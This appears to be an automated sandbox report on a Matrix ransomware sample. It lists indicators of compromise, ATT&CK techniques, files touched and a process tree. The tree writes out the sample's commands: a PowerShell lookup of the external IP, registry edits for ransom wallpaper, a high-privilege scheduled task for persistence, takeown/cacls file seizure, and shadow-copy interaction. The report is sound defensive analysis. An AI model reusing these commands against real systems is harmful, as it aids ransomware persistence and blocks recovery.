File opened (read-only)	\??\E:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\W:	wUY1KnWt64.exe
File opened (read-only)	\??\V:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\L:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\M:	wUY1KnWt64.exe
File opened (read-only)	\??\I:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\F:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\Q:	wUY1KnWt64.exe
File opened (read-only)	\??\T:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\N:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened (read-only)	\??\M:	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
154	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\HOuZWaL4.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\classlist	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.55\MicrosoftEdgeUpdateCore.exe	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\LICENSE.DATA	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\updater.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\en-US.pak	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\skin.dtd	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\javaws.exe	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\tnameserv.exe	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_it.properties	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jhat.exe	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jdb.exe	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\java.exe	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.access	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_LinkDrop32x32.gif	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496937509.profile.gz	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\de.pak	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\NEWS.txt	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\ext\nashorn.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Mozilla Firefox\dependentlibs.list	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\identity_helper.Sparse.Canary.msix	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\autofill_labeling_features_email.txt	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\id.pak	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\dnsns.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\wsgen.exe	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\#FOX_README#.rtf	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2400	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2752	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1808	powershell.exe
1808	powershell.exe
2448	wUY1KnWt64.exe
2448	wUY1KnWt64.exe
2448	wUY1KnWt64.exe
2448	wUY1KnWt64.exe
2448	wUY1KnWt64.exe
2448	wUY1KnWt64.exe
2448	wUY1KnWt64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
2448	wUY1KnWt64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeTakeOwnershipPrivilege	308	takeown.exe
Token: SeDebugPrivilege	2448	wUY1KnWt64.exe
Token: SeLoadDriverPrivilege	2448	wUY1KnWt64.exe
Token: SeTakeOwnershipPrivilege	1560	takeown.exe
Token: SeTakeOwnershipPrivilege	2880	takeown.exe
Token: SeTakeOwnershipPrivilege	3656	takeown.exe
Token: SeTakeOwnershipPrivilege	3144	takeown.exe
Token: SeTakeOwnershipPrivilege	2700	takeown.exe
Token: SeTakeOwnershipPrivilege	3012	takeown.exe
Token: SeTakeOwnershipPrivilege	680	takeown.exe
Token: SeTakeOwnershipPrivilege	2488	takeown.exe
Token: SeTakeOwnershipPrivilege	3596	takeown.exe
Token: SeTakeOwnershipPrivilege	3376	takeown.exe
Token: SeTakeOwnershipPrivilege	1344	takeown.exe
Token: SeTakeOwnershipPrivilege	624	takeown.exe
Token: SeTakeOwnershipPrivilege	3360	takeown.exe
Token: SeTakeOwnershipPrivilege	1888	takeown.exe
Token: SeTakeOwnershipPrivilege	3596	takeown.exe
Token: SeTakeOwnershipPrivilege	2580	takeown.exe
Token: SeTakeOwnershipPrivilege	3360	takeown.exe
Token: SeTakeOwnershipPrivilege	1888	takeown.exe
Token: SeTakeOwnershipPrivilege	3360	takeown.exe
Token: SeTakeOwnershipPrivilege	2580	takeown.exe
Token: SeTakeOwnershipPrivilege	624	takeown.exe
Token: SeTakeOwnershipPrivilege	680	takeown.exe
Token: SeTakeOwnershipPrivilege	3560	takeown.exe
Token: SeTakeOwnershipPrivilege	3012	takeown.exe
Token: SeTakeOwnershipPrivilege	3804	takeown.exe
Token: SeTakeOwnershipPrivilege	2580	takeown.exe
Token: SeTakeOwnershipPrivilege	2880	takeown.exe
Token: SeTakeOwnershipPrivilege	2684	takeown.exe
Token: SeTakeOwnershipPrivilege	3616	takeown.exe
Token: SeTakeOwnershipPrivilege	2176	takeown.exe
Token: SeTakeOwnershipPrivilege	2580	takeown.exe
Token: SeTakeOwnershipPrivilege	3560	takeown.exe
Token: SeTakeOwnershipPrivilege	1476	takeown.exe
Token: SeBackupPrivilege	3740	vssvc.exe
Token: SeRestorePrivilege	3740	vssvc.exe
Token: SeAuditPrivilege	3740	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4224	WMIC.exe
Token: SeSecurityPrivilege	4224	WMIC.exe
Token: SeTakeOwnershipPrivilege	4224	WMIC.exe
Token: SeLoadDriverPrivilege	4224	WMIC.exe
Token: SeSystemProfilePrivilege	4224	WMIC.exe
Token: SeSystemtimePrivilege	4224	WMIC.exe
Token: SeProfSingleProcessPrivilege	4224	WMIC.exe
Token: SeIncBasePriorityPrivilege	4224	WMIC.exe
Token: SeCreatePagefilePrivilege	4224	WMIC.exe
Token: SeBackupPrivilege	4224	WMIC.exe
Token: SeRestorePrivilege	4224	WMIC.exe
Token: SeShutdownPrivilege	4224	WMIC.exe
Token: SeDebugPrivilege	4224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4224	WMIC.exe
Token: SeRemoteShutdownPrivilege	4224	WMIC.exe
Token: SeUndockPrivilege	4224	WMIC.exe
Token: SeManageVolumePrivilege	4224	WMIC.exe
Token: 33	4224	WMIC.exe
Token: 34	4224	WMIC.exe
Token: 35	4224	WMIC.exe
Token: 36	4224	WMIC.exe
Token: SeTakeOwnershipPrivilege	4360	takeown.exe
Token: SeIncreaseQuotaPrivilege	4224	WMIC.exe
Token: SeSecurityPrivilege	4224	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 216 wrote to memory of 3560	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	57
PID 216 wrote to memory of 3560	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	57
PID 216 wrote to memory of 3560	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	57
PID 216 wrote to memory of 3036	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	59
PID 216 wrote to memory of 3036	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	59
PID 216 wrote to memory of 3036	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	59
PID 216 wrote to memory of 1964	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	68
PID 216 wrote to memory of 1964	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	68
PID 216 wrote to memory of 1964	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	68
PID 1964 wrote to memory of 1808	1964	cmd.exe	70
PID 1964 wrote to memory of 1808	1964	cmd.exe	70
PID 1964 wrote to memory of 1808	1964	cmd.exe	70
PID 216 wrote to memory of 1908	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	71
PID 216 wrote to memory of 1908	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	71
PID 216 wrote to memory of 1908	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	71
PID 216 wrote to memory of 1516	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	73
PID 216 wrote to memory of 1516	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	73
PID 216 wrote to memory of 1516	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	73
PID 1516 wrote to memory of 3048	1516	cmd.exe	75
PID 1516 wrote to memory of 3048	1516	cmd.exe	75
PID 1516 wrote to memory of 3048	1516	cmd.exe	75
PID 1908 wrote to memory of 1616	1908	cmd.exe	76
PID 1908 wrote to memory of 1616	1908	cmd.exe	76
PID 1908 wrote to memory of 1616	1908	cmd.exe	76
PID 216 wrote to memory of 2208	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	77
PID 216 wrote to memory of 2208	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	77
PID 216 wrote to memory of 2208	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	77
PID 1908 wrote to memory of 3600	1908	cmd.exe	79
PID 1908 wrote to memory of 3600	1908	cmd.exe	79
PID 1908 wrote to memory of 3600	1908	cmd.exe	79
PID 1908 wrote to memory of 2504	1908	cmd.exe	80
PID 1908 wrote to memory of 2504	1908	cmd.exe	80
PID 1908 wrote to memory of 2504	1908	cmd.exe	80
PID 2208 wrote to memory of 3184	2208	cmd.exe	81
PID 2208 wrote to memory of 3184	2208	cmd.exe	81
PID 2208 wrote to memory of 3184	2208	cmd.exe	81
PID 2208 wrote to memory of 308	2208	cmd.exe	82
PID 2208 wrote to memory of 308	2208	cmd.exe	82
PID 2208 wrote to memory of 308	2208	cmd.exe	82
PID 2208 wrote to memory of 3928	2208	cmd.exe	83
PID 2208 wrote to memory of 3928	2208	cmd.exe	83
PID 2208 wrote to memory of 3928	2208	cmd.exe	83
PID 3928 wrote to memory of 1248	3928	cmd.exe	84
PID 3928 wrote to memory of 1248	3928	cmd.exe	84
PID 3928 wrote to memory of 1248	3928	cmd.exe	84
PID 1248 wrote to memory of 2448	1248	wUY1KnWt.exe	86
PID 1248 wrote to memory of 2448	1248	wUY1KnWt.exe	86
PID 216 wrote to memory of 1344	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	87
PID 216 wrote to memory of 1344	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	87
PID 216 wrote to memory of 1344	216	3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe	87
PID 1344 wrote to memory of 1620	1344	cmd.exe	89
PID 1344 wrote to memory of 1620	1344	cmd.exe	89
PID 1344 wrote to memory of 1620	1344	cmd.exe	89
PID 1344 wrote to memory of 2844	1344	cmd.exe	90
PID 1344 wrote to memory of 2844	1344	cmd.exe	90
PID 1344 wrote to memory of 2844	1344	cmd.exe	90
PID 1344 wrote to memory of 2176	1344	cmd.exe	91
PID 1344 wrote to memory of 2176	1344	cmd.exe	91
PID 1344 wrote to memory of 2176	1344	cmd.exe	91
PID 2176 wrote to memory of 3012	2176	cmd.exe	92
PID 2176 wrote to memory of 3012	2176	cmd.exe	92
PID 2176 wrote to memory of 3012	2176	cmd.exe	92
PID 1344 wrote to memory of 308	1344	cmd.exe	93
PID 1344 wrote to memory of 308	1344	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
"C:\Users\Admin\AppData\Local\Temp\3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:216
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe" "C:\Users\Admin\AppData\Local\Temp\NWoU3LGX.exe"
  2⤵
  PID:3560
- C:\Users\Admin\AppData\Local\Temp\NWoU3LGX.exe
  "C:\Users\Admin\AppData\Local\Temp\NWoU3LGX.exe" -n
  2⤵
  - Executes dropped EXE
  PID:3036
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\cmXrsYRX.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\HOuZWaL4.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\HOuZWaL4.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1616
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:3600
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:2504
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\d2JQDgMj.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\d2JQDgMj.vbs"
    3⤵
    - Checks computer location settings
    PID:3048
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3gokKXdQ.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:3348
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3gokKXdQ.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:2400
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:920
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:2160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:3184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3928
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1248
    - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt64.exe
        
